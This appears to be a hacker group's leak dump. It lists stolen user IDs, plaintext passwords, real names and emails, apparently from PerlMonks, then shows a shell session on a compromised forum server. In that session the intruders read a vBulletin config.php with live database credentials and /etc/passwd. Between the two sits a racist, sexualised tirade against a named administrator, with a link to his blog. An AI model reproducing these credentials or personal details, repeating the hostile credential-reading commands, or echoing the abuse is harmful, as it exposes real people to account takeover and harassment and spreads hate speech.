103111           1263               Joshua Rey                   jbr@ntlworld.com
204547       KAOjkcHk                      jon                jon@pigsbladder.com
540414       QhBWke73            John W. Krahn                   krahnj@telus.net
25823       black^sa          Jaldhar H. Vyas             jaldhar@braincells.com
310484       IMdF39bC                                                            
28188         fenian             Kevin Clancy               kpclancy@hotmail.com
218773       9JTBY458              Ben Daglish          bdaglish@surfnet-ds.co.uk
369157         public                   theshz                   theshz@gmail.com
16202         ch33se           Zenon Zabinski                zdog@rapstation.com
45391       Fm5etoW2                        x                    x@ichimunki.com
127547           jess              Baz Bremner           public@barriebremner.com
194928          smith           Rob Ransbottom               rir.gsmi@verizon.net
77235       VOfKiWdH           Michael Ridler          mridler@netstylemedia.com
203787       12point6                    devin             devin.austin@gmail.com
110976       ashkabla            chas friedman           friedman@math.utexas.edu
233329        xomyx76             Tina Mueller            perlmonks@s05.tinita.de
310822          pm4me               Anne Brown               anne@browndomain.com
144696        lilslut              Tom Legrady                 legrady@rogers.com
71127        akteron    Jason Karolczak-Konen                jason@karolczak.com
296575         m0nk3y             Steven Stone      stone@hcgl.eng.ohio-state.edu
159943       monkfeas        David Christensen      David.A.Christensen@gmail.com
502468       perl1274                    Chris               perlmonkey@gmail.com
89299       r1uqsh++                  PetaMem                     rj@petamem.com
298378         nalini              Arun Persad                 arunbear@gmail.com
57755       Wkc10XSy                 Ben Thul         perlmonks.thulben@xoxy.net
261960       goodpain                  Yoshiah           devildog_kutsu@yahoo.com
44950       JdjDF00C               Dean Inada                   dmi@questrel.com
294463         xevkai         Quantum Mechanic    Quantum.Mechanic.1964@gmail.com
217641       giants86              Thomas Pfau                   pfau@nbpfaus.net
245320           5356   Alberto Adrián Schiano               betoian@netscape.net
330779         hereot           Matija Grabnar                  matija@matija.com
350512       ffffjjjj              Ivan Tubert                      itub@cpan.org
9685         k1l1m5              mike dillon                     md5@embody.org
8157       bxmwaIhI              Brian Wisti              brian.wisti@gmail.com
209598        phenton               Tim Edgren                     tim@edgren.com
218135       auhfyr98Nkuvu the Wonder Tortoise           nkuvu.tortoise@gmail.com
141348       kungen66        Kristoffer Lundén                kung.stoffe@home.se
421540          p1x1e         Charles Colbourn              charlesc@colbourn.net
489086       cNQ864HC                   Mickey                 mickey75@gmail.com
22772       71r6tRwD            Theo Petersen             theopetersen@yahoo.com
106949       Toruc To             The Sidhekin              sidhekin@allverden.no
47040       13GsYTBp                    chady                    chady@chady.net
107600         tindbi            Damian Conway                  damian@conway.org
8948       ERC6mHaz                                           ar0n@perlmonk.org
186172         bender            Eli Bendersky                 spur4444@yahoo.com
406189       habakuck          Holger Hellmuth                hellmuth@ira.uka.de
8119       SidzkYfb          Tomas Andersson                  tomas@ibissoft.se
131165       Kc9-?2nM            David Jantzen          david.jantzen@comcast.net
541305       talisker              Clive Darke              clive.darke@qa-iq.com
190918         zauber             Tom Shinnick                    tshinnic@io.com
351094       cj98@jj0            david jenkins          djenkins@spaceimaging.com
227499         dammit                     Matt                  mleblanc@cpan.org
373324       gopal123                   gopalr           gopal.ind.2000@gmail.com
184322       SF5YWOXX                      GMP              gm@virtuasites.com.br
576594       2ml4{Fw}               Ira Byerly                 melaneus@gmail.com
480254       CkI8OF3c                Phil Crow             philcrow2000@yahoo.com
131262        black23             Steve Peters              steve@fisharerojo.org
111406        vincent          Gunnar Hägglund                 gunnar@optilens.se
175325       scooter5           Marco Marongiu                 bronto@tiscali.com
153701       2elwing1                    David               nimdokk@fluckers.com
313535          argv1           Michael DeHaan                 mpdehaan@nc.rr.com
186684       solament           Christian Renz                    crenz@web42.com
253915       mann1bac                  Stephan          perl.monk.skeeve@xoxy.net
223311       perlfish                      hmm                 perlhero@yahoo.com
162891         1Emsyl                      wil                   wil@stephens.org
62377       aBI9WXFU                 Tom Fili                    tom@tomfili.net
49266         Cor49t                   andrew             andrew-johnson@shaw.ca
391408       A4VWJcYO                 Theodore            theodore@websitters.com
69487        1YSOweb             Ben Warfield     benjamin.warfield@aya.yale.edu
20087       12three4               Mark Mills              extremely@hostile.org
184363       kiffvc20               Tom Regner                  tom@tomsdiner.org
89780       eesopdec   Ronnie Alfaro Herrera.                  ralfaro@gmail.com
373188          c1d3r           charlie harvey          charlie@charlieharvey.com
299295       Runner12             Paul Johnson                 pjohnson39@cox.net
36133        candy-o              Mark Morgan             lemming@quirkyqatz.com
472157       kNBiajNF           Chris Williams              chris@bingosnet.co.uk
163790       AB3I384U           Dave Sherohman                 dave@sherohman.org
116937       zoom_zzz            Raymond Field                  raymond@mvine.com
258928         redlip             Ted Cantrall            MonkMan at cantrall.net
178658         735140              David Hisel                    david@hisel.com
502458       A2cLCIFc                    simon            lepetitalbert@gmail.com
139427       ginasmom            Aaron Johnson                  solution@gina.net
416961         la0S99             Vidul Petrov                     root@vidul.com
201687         evg672             Bart Vetters                  robartes@nirya.be
336451          oiabm               Emile Aben                emileaben@yahoo.com
343950       phabphab        Emanuele Zeppieri                  emazep@tiscali.it
110201       t4H3b9x2      David A. Desrosiers             desrod@gnu-designs.com
47597        9346kpk         Alex J. Avriette                 avriette@gmail.com
253850         theman                    Ollie              perlmonks@kwaping.com
247561        svsingh             Sanjay Singh                      s@sanvash.com
65521       9jfyi4cj     John Joseph Trammell             johntrammell@yahoo.com
49324       caltemp7             Kerry Schwab             Kerry.Schwab@gmail.com
80543        palin75                      rws                  rws1111@gmail.com
17361       Mn1tyEiD           David Wollmann              converter42@gmail.com
29600        0bvious              Brad Bowman                bsb-monk@bereft.net
277600        3l33tj$              Joel Steele              injunjoel@hotmail.com
41288        myperlm  Jeroen Elassaiss-Schaap       jeroen.elassaiss@organon.com
177604       okkinnam               b mannikko                bmannikko@gmail.com
36507       Thd,th2.                     jynx             jynx.d.mouse@gmail.com
45946       wingding           Mark Beihoffer               mark@dragonfly-7.com
103344        type895                  Ryszard                     ba09@yahoo.com
290288       asdf1234                 Plankton          sheldonplankton@yahoo.com
137449        usblues          Peter Farabaugh                       pete@tbe.net
74129         baby96                    barrd                      barrd@mac.com
438717         ultim8         William Witteman                        wow@nerd.cx
205152       290685kj             Yuval Kogman           nothingmuch@woobling.org
2610        t1jpmpw            John Berthels               jjberthels@gmail.com
212789       kl0nd1k3                Jim Dwyer             jdwyeror@earthlink.net
468061         zaxxon              Hal Skinner                hgskinner@gmail.com
240337       8k3d9a1L              Curt Tilmes                    curt@tilmes.org
332319        coocf75           Ronnie Neumann         ronnie.neumann@t-online.de
460541       engin33r                    Peter        p_r_payne_2005@yahoo.com.au
272682       Gjhf9HFi                Eyck Wigo                pmspam@forumakad.pl
91903         123456                  Heise2k                 siragtar@yahoo.com
12207         buddha            Kevin Meltzer                perlguy@perlguy.com
83012       gopherit                 Ned Konz                 ned@bike-nomad.com
394960       29f9u46w              Sam Crawley           sam_crawley@warpmail.net
73487         vatsuG         Gustav Schaffter               gustav@schaffter.com
489671       iXCn8,Ve            David Serrano                dserrano5@gmail.com
133139       r0cknr0l             Bill Beesley                   bill@beesley.org
231169       1963punk                  punkish                punkish@eidesis.org
235663        plef350            Thomas Sibley               tom+pm@zulutango.org
464937       RR!0cske                Rick Rose           rickroseaus@netscape.net
7824        monkery              frank booth                  frankus@gmail.com
197321       pmpass12           jason woodward                 woodwardj@jaos.org
56130         pmken5               Ken Hirsch               kenhirsch@myself.com
509638       dogmatix             Dylan Martin               dmartin@sccd.ctc.edu
2329        flembok           Stephen Nelson                   senelson@tdl.com
393886         henhen            Edward WIJAYA             ewijaya@singnet.com.sg
512600       713pmKai             Kai Sengpiel                  kai@sengpiel.name
211693       worduppm      Damon Allen Davison            damon.davison@gmail.com
90987         $money             Matt Sanford                 MZSanford@cpan.org
37222       titpomRu            Gareth Morris                tenex50@hotmail.com
189756       24Rf988R                                  public@liquidfusion.org.uk
38800       isN9v0mn                                                            
555959       mechanic             ponnivalavan                 valavanp@gmail.com
5539        delphi1       Jonathan Hopkinson        jonathan.hopkinson@rbos.com
10795          kenny                El Warren                 elwarren@yahoo.com
28290       capslock             Dennis Sutch                   dennis@sutch.com
123017          hello               Joe Cullin                   pm@joecullin.com
67820       melville            Willem Basson                                   
3568       dirkgent                  Martijn                  xchoasx@gmail.com
85161         virgin                    Steve                     spatz@penn.com
600445       Cobra200             David Richey               dmrichey17@gmail.com
150658       BaSf6723        R. S. J. Thompson           rozallin@livejournal.com
222702        wi0432k                     parv                      parv@pair.com
127435       al3j5m22              Richard Voß                   info@fruiture.de
264639        maddan.            David Pointon             david.pointon@unix.net
27919          tomas             Jouke Visser                   jouke@pvoice.org
523944       8181-onn          Clinton Gormley               clint@traveljury.com
141786       IFTMfhVb                   T Hill                   tjhnow@yahoo.com
16834       jMKhTQ3r                    Briac            briac(at)pilpre(dot)com
272364       atla5boo           Brian Wightman    brian-perlmonks@wightmanfam.org
176753          sol26                    Uriel           uriel_lizama@hotmail.com
565709         lechat             Lino Ramirez           Lino.M.Ramirez@gmail.com
6035        xsv2200         Er Galvao Abbott                 galvao@perl.org.br
129189       n0tg0nna           Benjamin Smith                  defitro@gmail.com
43894        caliban          Ariel Scolnicov           ariels+pm@compugen.co.il
9463        Geekb0y                    brian         burnout@comradeburnout.com
209263         hermin             Erick Nelson         erick_nelson@homedepot.com
11400        ]f/#3Ow           Joseph Harnish              big_joe1008@yahoo.com
129551       fj2CUaPY               David Toso         erroneousBollock@gmail.com
123137        foo9bar                     sean             educated_foo@yahoo.com
460726       I7NYstat                                         fenLisesi@gmail.com
647953         easter            Mike Robinson         sundial.services@gmail.com
8911       realtime               Matt Rosin                 mattr@telebody.com
189168        rad1an5             Leif Eriksen                                   
102902         d02g19                       DG        DamnDirtyApe@MutantMail.com
21569         tffqea           Matt Diephouse                 matt@diephouse.com
8836       WqacX8NK            Adam Thomason    thomason@reticulatedsplines.net
323154           1154                     Imre            perlmonks.org@saling.ch
12209        redstar                   clintp            clintp_PM@geeksalad.org
233158       physc001         Stephen Williams                  sunadmn@yahoo.com
415035       envagyok              Gabor Szabo                  gabor@perl.org.il
347753         p1e51a          valued customer               scooterm@hotmail.com
18122         Apple!                   AgentM       agentm@themactionfaction.com
174110       r4ut4tie                                        roke@persaukiset.org
239281       elminste                    Arden           arden.meyer@afccc.af.mil
125487       GWBMZIUY       Jacinta Richardson         jarich@perltraining.com.au
83713         x3L3nt                        k                       web@khay.org
71198       diddums9          Anthony Staines             Anthony.Staines@ucd.ie
7056          enterEduardo Arino de la Rubia                       ed@arino.net
114324       whocares           Frank Bardelli               fbardelli@nyc.rr.com
45674       movies24               Amy Bratty                ldyhwke24@yahoo.com
125863       Wej99hVP            Peppi Vecchio            pvecchio@orangelake.com
52296       sidewind             Rob Svirskas                    robsv@yahoo.com
244306       blacksun              Dan Hetrick               dhetrick@riotmod.com
59285       ziag3E,t             Drake Wilson           ww7glvc02@sneakemail.com
35324        catbite           Gary Blackburn                 gblackburn@mac.com
136291       54buenav            John J Reiser              jr@newrisedesigns.com
236234         b00b33              Ephraim Dan              ephraim_dan@yahoo.com
31011       4lc4tr4z            Ralf Buescher               buescher@hotmail.com
97646         com.mc           Mark Ceulemans            mark.ceulemans@yucom.be
10158       AmOL4KPN                Andy Ford             andyford@agedwards.com
19840         poople       Michael Villeneuve        michaelv@nortelnetworks.com
31063        perl625            Rhet Turnbull                rturnbull@gmail.com
152175        monello          Immanuel Lasker                ilasker@hotmail.com
277103       talisman             Daniel Inman             daniel@danielinman.com
243154       replaced                                  perlscienceman@hotmail.con
23324        catfood                      j s                    jptxs@yahoo.com
493758          korwa                Mike Oron             moronisch@netscape.net
1553       code+bal         Made in the Dark                      mitd@mitd.com
91846       fafixexe              Dan MacNeil                        dan@ltc.org
33990       cxzdoeze           Regina Burbach                  wurzelchen@gmx.de
200365         XuttuX           H.Merijn Brand                h.m.brand@xs4all.nl
59207       stef1020         scott stefanoski                scottstef@yahoo.com
512341       q1w2e3r4               leo charre                                   
260843         careca        Luis Motta Campos       monsieur_champs@yahoo.com.br
20513         spiral            Mark Stosberg               mark@summersault.com
154438       ZdMFNZCU               Bruce Gray                 bruce.gray@acm.org
69394       Shannon.         Chuck Charbeneau             chuck@saraandchuck.com
185225        was2was                   Waswas                  waswas@fallon.com
41758            pop                    andye                                   
221484         ocard1             Alan Cameron            paladin@techmonkeys.org
59896        guessme               Tom Hukins                    tom@eborcom.com
150245          g@bb@             Logan Hawkes             logan.hawkes@gmail.com
85506       p5.1mo_n          Torsten Hofmann                 T.E.Hofmann@gmx.de
58682        100%Fun               Scott Cain                 scain@athersys.com
387687          kuchi                                                            
79379       HONXjahc                     GRAQ               perlmonks@graq.co.uk
126041       foom1138              Steven Bach                   moof1138@mac.com
169603       TuTmoSiS                moxliukas                 moxliukas@delfi.lt
81423         Westol         Daniel J. Wright               perlmonk@dwright.org
55272       abmayfai            Bart Parliman                     bartp@lanl.gov
275605         brutto           Mario Kasparov          mariokasparov@hotmail.com
694676        mg92292                     Marc             saikiattrick@gmail.com
43868       CapsLock                  epoptai               epoptai@monmouth.com
712372         grmblv        Kenneth Kroenlein               kkroenlein@gmail.com
31280       snoopy:m        Christian Lemburg                    lemburg@acm.org
115801       codec0MP                Jay Bonci           jaybonci@everything2.com
495617       puniseth                  Punitha              puni_5984@yahoo.co.in
341073         sommex            Frank Wiegand                      frank@kcet.de
252827       Jack$58c             alex knowles               alex@alixandalex.com
89172         reklaw               Jim Walker               jim@jameswwalker.com
366581         esel23                                           tivolimonk@gmx.at
125121       MonkPerl        Scott T. Hildreth             shildreth@emsphone.com
16314         monkme            Rich Williams                    rdw@perldog.com
485015       7C2dD85d              Dean Arnold             darnold@presicient.com
110814       fickling               Red Haring            perlmonks@nolaflash.com
5094       dhbim?84        Stefan Kamphausen                  pm@skamphausen.de
52492        ewt1618                  azatoth                                   
289824        isaac01                      Joe              hteam1@mindspring.com
5999       hab4r0mo            Diego Zamboni                    zamboni@acm.org
132180       princess                       se                   sgetty@email.com
446719       IIceOEEP                   kyoshu                   kyoshu@gmail.com
5406        nangell          Chip Salzenberg                     chip@pobox.com
74757         fcb093                  Jasmine                   dmerced@uark.edu
270952         tygger                    Bryan                  bryan42@gmail.com
326696       6aWMOZ3X                    rvosa                       rvosa@sfu.ca
615480       iIfjafF8        Miguel Pignatelli            miguel.pignatelli@uv.es
11052        8901172             Mike Imamura                 zoogie@lugatgt.org
46495          jklop              peter allen                peter_allen@ibi.com
19314       vandalia                 Maverick             maverick@smurfbane.org
219414       dRUA69La              Mark Mielke                mark@mark.mielke.cc
66950        omega+7            Charles Reiss            gtg303y@mail.gatech.edu
48685       electron            David Dorward                david@dorward.me.uk
128665        strange                    Gavin                       gav@japh.org
424604       ab12cd34      G. Allen Morris III             gam3-perlmonk@gam3.net
395537       ashokjes       Anthony Jesu Ashok               anjeas_net@yahoo.com
116575       Ferber21           Steve Sapovits          sapovitss@gsicommerce.com
5565         acimox                                                            
227005         yatzee                 Cees Hek              cees@sitesuite.com.au
628526         vg89re             Adam Marquis               adam@adammarquis.com
131128        blocked           russell cecala                            blocked
68278         tje911        Bradley K. Embree                      bke@bkecc.com
52855        d8kz3io                                                            
7102       hJcljtmZ                  Ken Ray                 kenr86@hotmail.com
122163         jonny5             Joshua Kruck             joshua.kruck@gmail.com
115693       dainese1                    Tiago                   tstock@tiago.com
85412       CTjUCabf      Charles K. Clarkson               cclarkson@htcomp.net
131381       mushin69              CJ Carlisle            CJ_Carlisle@hotmail.com
522408       cosapopt                 João Sil                     sil@co.sapo.pt
59531       hortense          Dan Collis Puro               dpuro@mindspring.com
146276       tarpskca                   jsprat           jack_sprat49@hotmail.com
287302         viscus           Steffen Müller                                   
51515          n3k57               Cory Johns               darkness@yossman.net
409485       tUI24JEX              Thilo Planz                     thilo@cpan.org
60407          email       Thimal Jayasooriya              timmy_jay18@yahoo.com
196557       m9fg-wWc                  vwvwvwv                                   
618967       AD997NfY              Erez Schatz              erez.schatz@gmail.com
40469         vsmelt               Tim Rayner              tfrayner@ntlworld.com
150584       pillittu             Roberto Nahi            robertonahi@hotmail.com
23227       n8UPDIED               Steve West               steve@lemniscate.net
136567           puck                     Mike             costa@cs.colostate.edu
1598        $eam0ns             Paul Seamons                   paul@seamons.com
114167         p4j4$0             Giulio Motta              blut@postmaster.co.uk
108432       fa4ci2le            Ben Bumgarner             ben@pushdownstairs.com
162080         fiets0                     Jaap        perlmonks.org@teun.demon.nl
46399       aQu7OMVc               Kent Reeve                   TheReeve@aol.com
53018       863ITHBJ            Pieter Allaer            pieter_allaer@valor.com
101553       4OkOMAfi             Rex Corrovan                 rex555@hotmail.com
7873       techcurv             Brett Sanger              swiftone@swiftone.org
63769       p3rlp1l0                    Jason                    mrpilot@cox.net
694914       G7hEMfdP                   dHarry               hmetselaar@gmail.com
53043        jjd7373          Jeremy Deterick                 j.deterick@att.net
363655       whitenov             Lane VanHout                lane@cityassist.com
11332         niwi02                                          kulesa@netzero.net
607636       bukanbir         Hasanuddin Tamir                   hasant@gmail.com
21732       bookmonk                     BooK                 book@mongueurs.net
399498        Ad4mned                     Eric                   nospam@yahoo.com
400549       U2W7Ckdj                     Dave                    dave@socket.net
96169       KihIeZXW        Christopher Yocum                   cyocum@gmail.com
29772           dave                     dave                    drus415@aol.com

In case you guys are worried, we did NOT backdoor dozens of your public Perl
projects. Honest. Why would we want to do that?

Not worth our time ;)


                                           |
                                       \       /            _\/_
      elitehackers                       .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
    A shot gun blast into the face of deceit                        |
      You'll gain your just reward.
        We'll not rest until the purge is complete
          You will reap what you've sown.
            My redemption lies in your demise.


For those of you who don't know, elitehackers.com/info has been a breeding
ground for skiddies since the 90's or something before the web 2.0 fuzz, when
ping-of-death was king and when phreaking was cool.

The admins/mods live in the past so when some idiot joins and posts "HOW CAN I
HAX WITH TELNET" flame furry is unleashed upon them and links such as
catb.org/esr/faqs/hacker-howto.html are thrown around. They're just the source
of misinformation and plain stupidity, nobody knows how to write half-decent
code and of course nobody actually bothers with hacking or anything closely
related.

We had to own them because they did claim awesome system administration skillz
and how nobody has ./hax0red them since the 90's and of course they claim to be
ELITE hackers, although our awesome investigation skillz have failed us to find
any kind of hackers there. 

Why this site is still even running is a mystery, it's just a waste of
bandwidth.

Napta the elite system administrator who administers and secures this piece of
crap on the internet loves to show off his "awesome" ./administration skillz at
http://ajclark.wordpress.com if you have issues with your bowel movement and
can't take a decent crap we highly suggest Napta's blog as a laxative.

Talking about Napta, he's a loner kid from the UK who suffers from egomania
because his weewee is too small. He is mixed race between a chinese and a
herpes infected 12 year old Filipino prostitute, thus he cannot get laid and
must flood the internet with bullcrap to feel better about himself.

Let's see how awesome this Chinese-Filipino half-breed is.

www-data@blaze:/var/vhosts/elitehackers.info/public_html/forums/includes$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blaze:/var/vhosts/elitehackers.info/public_html/forums/includes$ uname
-a
Linux blaze.nixnetworks.net 2.6.18.8-linode10 #2 SMP Sat Jul 19 20:24:32 EDT
2008 i686 GNU/Linux
www-data@blaze:/var/vhosts/elitehackers.info/public_html/forums/includes$ cat
config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.6.0 - Licence Number VBFAB23322
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2006 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to	  |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables	  |
| in this file. 					  |
\*-------------------------------------------------------*/

	//	****** DATABASE TYPE ******
	//	This is the type of the database server on which your vBulletin
database will be located.
	//	Valid options are mysql and mysqli.  Try to use mysqli if you
are using PHP 5 and MySQL 4.1+
$config['Database']['dbtype'] = 'mysql';

	//	****** DATABASE NAME ******
	//	This is the name of the database where your vBulletin will be
located.
	//	This must be created by your webhost.
$config['Database']['dbname'] = 'eh2005_ehforums';

	//	****** TABLE PREFIX ******
	//	Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = 'vb3_';

	//	****** TECHNICAL EMAIL ADDRESS ******
	//	If any database errors occur, they will be emailed to the
address specified here.
	//	Leave this blank to not send any emails when there is a
database error.
$config['Database']['technicalemail'] = 'nighthalk@elitehackers.info';

	//	****** FORCE EMPTY SQL MODE ******
	// New versions of MySQL (4.1+) have introduced some behaviors that are
	// incompatible with vBulletin. Setting this value to "true" disables
those
	// behaviors. You only need to modify this value if vBulletin
recommends it.
$config['Database']['force_sql_mode'] = false;



	//	****** MASTER DATABASE SERVER NAME AND PORT ******
	//	This is the hostname or IP address and port of the database
server.
	//	If you are unsure of what to put here, leave the default
values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

	//	****** MASTER DATABASE USERNAME & PASSWORD ******
	//	This is the username and password you use to access MySQL.
	//	These must be obtained through your webhost.
$config['MasterServer']['username'] = 'eh2005_halk';
$config['MasterServer']['password'] = '01pepsi01';

	//	****** MASTER DATABASE PERSISTENT CONNECTIONS ******
	//	This option allows you to turn persistent connections to MySQL
on or off.
	//	The difference in performance is negligible for all but the
largest boards.
	//	If you are unsure what this should be, leave it off. (0 = off;
1 = on)
$config['MasterServer']['usepconnect'] = 0;



	//	****** SLAVE DATABASE CONFIGURATION ******
	//	If you have multiple database backends, this is the information
for your slave
	//	server. If you are not 100% sure you need to fill in this
information,
	//	do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



	//	****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
	//	This setting allows you to change the name of the folders that
the admin and
	//	moderator control panels reside in. You may wish to do this for
security purposes.
	//	Please note that if you change the name of the directory here,
you will still need
	//	to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'acp';
$config['Misc']['modcpdir'] = 'mcp';

	//	Prefix that all vBulletin cookies will have
	//	Keep this short and only use numbers and letters, i.e. 1-9 and
a-Z
$config['Misc']['cookieprefix'] = 'ehbb';

	//	******** FULL PATH TO FORUMS DIRECTORY ******
	//	On a few systems it may be necessary to input the full path to
your forums directory
	//	for vBulletin to function normally. You can ignore this setting
unless vBulletin
	//	tells you to fill this in. Do not include a trailing slash!
	//	Example Unix:
	//	  $config['Misc']['forumpath'] =
'/home/users/public_html/forums';
	//	Example Win32:
	//	  $config['Misc']['forumpath'] = 'c:\program files\apache
group\apache\htdocs\vb3';
$config['Misc']['forumpath'] =
'/usr/local/www/vhosts/elitehackers.info/httpdocs/forums';




	//	****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
	//	The users specified here will be allowed to view the admin log
in the control panel.
	//	Users must be specified by *ID number* here. To obtain a user's
ID number,
	//	view their profile via the control panel. If this is a new
installation, leave
	//	the first user created will have a user ID of 1. Seperate each
userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1,8058';

	//	****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
	//	The users specified here will be allowed to remove ("prune")
entries from the admin
	//	log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1,8058';

	//	****** USERS WITH QUERY RUNNING PERMISSIONS ******
	//	The users specified here will be allowed to run queries from
the control panel.
	//	See the above entries for more information on the format.
	//	Please note that the ability to run queries is quite powerful.
You may wish
	//	to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

	//	****** UNDELETABLE / UNALTERABLE USERS ******
	//	The users specified here will not be deletable or alterable
from the control panel by any users.
	//	To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '8058';

	//	****** SUPER ADMINISTRATORS ******
	//	The users specified below will have permission to access the
administrator permissions
	//	page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1,8058';

	// ****** DATASTORE CACHE CONFIGURATION *****
	// Here you can configure different methods for caching datastore
items.
	// vB_Datastore_Filecache  - for using a cache file
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
	// vB_Datastore_Memcached - for using a Memcache server
	// It is also necessary to specify the hostname or IP address and the
port the server is listening on
// $config['Datastore']['class'] = 'vB_Datastore_Memcached';
// $config['Misc']['memcacheserver'] = '127.0.0.1';
// $config['Misc']['memcacheport'] = '11211';

// ****** The following options are only needed in special cases ******

	//	****** MySQLI OPTIONS *****
	// When using MySQL 4.1+, MySQLi should be used to connect to the
database.
	// If you need to set the default connection charset because your
database
	// is using a charset other than latin1, you can set the charset here.
	// If you don't set the charset to be the same as your database, you
	// may receive collation errors.  Ignore this setting unless you
	// are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';

	//	Optionally, PHP can be instructed to set connection parameters
by reading from the
	//	file named in 'ini_file'. Please use a full path to the file.
	//	Example:
	//	$config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL
Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 01:36, Sat Aug 5th 2006
|| # CVS: $RCSfile: config.php.new,v $ - $Revision: 1.35 $
|| ####################################################################
\*======================================================================*/

>


www-data@blaze:/var/vhosts/elitehackers.info/public_html/forums/includes$ ls
-al /var/vhosts
total 13
drwxr-xr-x 13 www-data		 www-data 1024 Aug 30 18:13 .
drwxr-xr-x 16 root		 root	  1024 Aug 31 15:20 ..
drwxr-xr-x  5 blog.cactusx3	 www-data 1024 Aug 31 16:56 blog.cactusx3.com
drwxr-xr-x  5 blog.jamespero	 www-data 1024 Oct 28 13:57 blog.jamespero.com
drwxr-xr-x  5 bullybreedresource www-data 1024 Aug 30 17:11
bullybreedresource.com
drwxr-xr-x  5 cactusx3		 www-data 1024 Aug 30 17:08 cactusx3.com
drwxr-xr-x  5 chaddavidwagner	 www-data 1024 Aug 30 17:09 chaddavidwagner.com
drwxr-xr-x  5 da-family 	 www-data 1024 Aug 30 17:09 da-family.net
drwxr-xr-x  6 elitehackers	 www-data 1024 Oct 25 16:38 elitehackers.info
drwxr-xr-x  5 fadedsanity	 www-data 1024 Aug 30 17:10 fadedsanity.com
drwxr-xr-x  4 jamespero 	 www-data 1024 Aug 30 18:13
james.nixnetworks.net
drwxr-xr-x  5 jamespero 	 www-data 1024 Oct 28 13:56 jamespero.com
drwxr-xr-x  5 nixnetworks	 www-data 1024 Aug 31 15:46 nixnetworks.net


www-data@blaze:/var/vhosts/elitehackers.info/public_html/forums/includes$ cat
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
napta2k:x:1000:1000:Allan Clark,,,:/home/napta2k:/bin/bash
George:x:1001:1001:George Fischer,,,:/home/George:/bin/bash
postfix:x:101:104::/var/spool/postfix:/bin/false
mysql:x:102:106:MySQL Server,,,:/var/lib/mysql:/bin/false
proftpd:x:103:65534::/var/run/proftpd:/bin/false
ftp:x:104:65534::/home/ftp:/bin/false
elitehackers:x:1002:33::/var/vhosts/elitehackers.info:/sbin/nologin
bullybreedresource:x:1003:33::/var/vhosts/bullybreedresource.com:/sbin/nologin
cactusx3:x:1004:33::/var/vhosts/cactusx3.com:/sbin/nologin
chaddavidwagner:x:1005:33::/var/vhosts/chaddavidwagner.com:/sbin/nologin
da-family:x:1006:33::/var/vhosts/da-family.net:/sbin/nologin
fadedsanity:x:1007:33::/var/vhosts/fadedsanity.com:/sbin/nologin
jamespero:x:1008:33::/var/vhosts/jamespero.com:/sbin/nologin
nixnetworks:x:1009:33::/var/vhosts/nixnetworks.net:/sbin/nologin
bind:x:105:107::/var/cache/bind:/bin/false
dovecot:x:106:108:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
vmail:x:5000:5000::/var/vmail:/bin/sh
blog.jamespero:x:5001:33::/var/vhosts/blog.jamespero.com:/sbin/nologin
blog.cactusx3:x:5002:33::/var/vhosts/blog.cactusx3.com:/sbin/nologin


www-data@blaze:/var/vhosts/elitehackers.info/public_html$ ls -al
total 12
drwxr-xr-x  5 elitehackers www-data 1024 Oct 25 16:38 .
drwxr-xr-x  6 elitehackers www-data 1024 Oct 25 16:38 ..
-rw-r--r--  1 elitehackers www-data  257 Sep 12 17:58 .htaccess
-rw-r--r--  1 elitehackers www-data  722 Apr 13  2008 favicon.ico
drwxr-xr-x 19 elitehackers www-data 3072 Sep 12 19:50 forums
